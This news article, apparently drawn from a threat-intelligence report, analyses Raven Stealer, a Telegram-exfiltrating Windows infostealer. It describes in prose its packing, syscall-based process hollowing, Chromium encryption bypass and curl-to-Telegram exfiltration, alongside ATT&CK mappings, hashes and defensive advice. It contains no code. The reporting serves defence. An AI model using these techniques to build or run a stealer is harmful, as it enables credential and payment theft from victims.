Raven Stealer Malware Exploits Telegram to Steal Logins, Payment Data, and Autofill Info

Raven Stealer has emerged as sophisticated, lightweight information-stealing malware crafted in Delphi and C++, targeting Windows systems with a focus on extracting sensitive data like logins, payment details, and autofill information from Chromium-based browsers such as Chrome and Edge.

First spotted on GitHub on July 15, 2025, this malware operates with high stealth, requiring minimal user interaction while employing modular architecture for seamless deployment.

Promoted under the pretext of “educational use” via a Telegram channel named ZeroTrace, Raven Stealer integrates real-time exfiltration through Telegram bots, allowing even novice threat actors to orchestrate credential-harvesting campaigns.

Its compiled binaries, packed with UPX to reduce size and evade static detection, execute invisibly without UI elements, leveraging techniques like hidden windows and process hollowing to bypass defenses.

According to Cyfirma report, this positions Raven as a commodity tool in the malware-as-a-service (MaaS) space, with links to similar variants like Octalyn Stealer from the same ZeroTrace Team, indicating a strategy of diversification to dominate low-tier illicit markets.

Technical Breakdown

Static analysis of samples like RavenStealer.exe (MD5: 6237a776e38b6a60229ac12fc6b21fb3) and v8Axs07p.3mf.exe (MD5: f74ec376aa22ce0b0d55023d8877dc72) reveals a Delphi-based builder GUI that embeds Telegram bot tokens and chat IDs directly into payloads, generating randomized 12-character filenames for stubs written in C++.

High entropy values confirm UPX packing, which complicates reverse engineering, while embedded resources store plaintext bot credentials under IDs 102 and 103.

The malware injects a ChaCha20-encrypted PAYLOAD_DLL into suspended browser processes using direct syscalls like NtAllocateVirtualMemory and NtWriteVirtualMemory, enabling reflective process hollowing without disk writes.

This bypasses Chromium’s App-Bound Encryption (ABE) by launching browsers in headless mode with flags like –no-sandbox and –disable-gpu, facilitating in-memory decryption of passwords, cookies, and payment data.

Dynamic analysis shows enumeration of system artifacts, including crypto wallets, VPN clients, and gaming platforms, with stolen data organized in %Local%RavenStealer subfolders before compression into ZIP archives suffixed with the victim’s username.

Exfiltration occurs via curl.exe invoking Telegram’s /sendDocument API, transmitting archives containing structured files like passwords.txt, cookies.txt, payment.txt, and screenshot.png for session hijacking and financial exploitation.

Mapped to MITRE ATT&CK, Raven employs tactics such as T1027 (Obfuscated Files or Information) for packing, T1564.003 (Hidden Window) for evasion, T1083 (File and Directory Discovery) for credential hunting, and T1071 (Application Layer Protocol) for C2 via Telegram, underscoring its comprehensive attack chain from execution to exfiltration.

Defensive Recommendations

Attributed to the ZeroTrace Team, active since April 30, 2025, on Telegram and GitHub, the developers maintain a hub for updates, tutorials, and variants, using hardcoded author tags in source files like RavenStealer.cpp.

This infrastructure replaces traditional C2 with Telegram’s anonymity for bot-driven data delivery.

Raven’s silent operation, modular design, and broad targeting of browsers, wallets, and services amplify its threat potential, urging defenses like monitoring for UPX-packed executables, anomalous browser launches, and Telegram API traffic.

Strategic mitigations include endpoint detection for syscall injections and behavioral analytics to counter virtualization evasion.

Indicator of Compromises (IoCs)

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!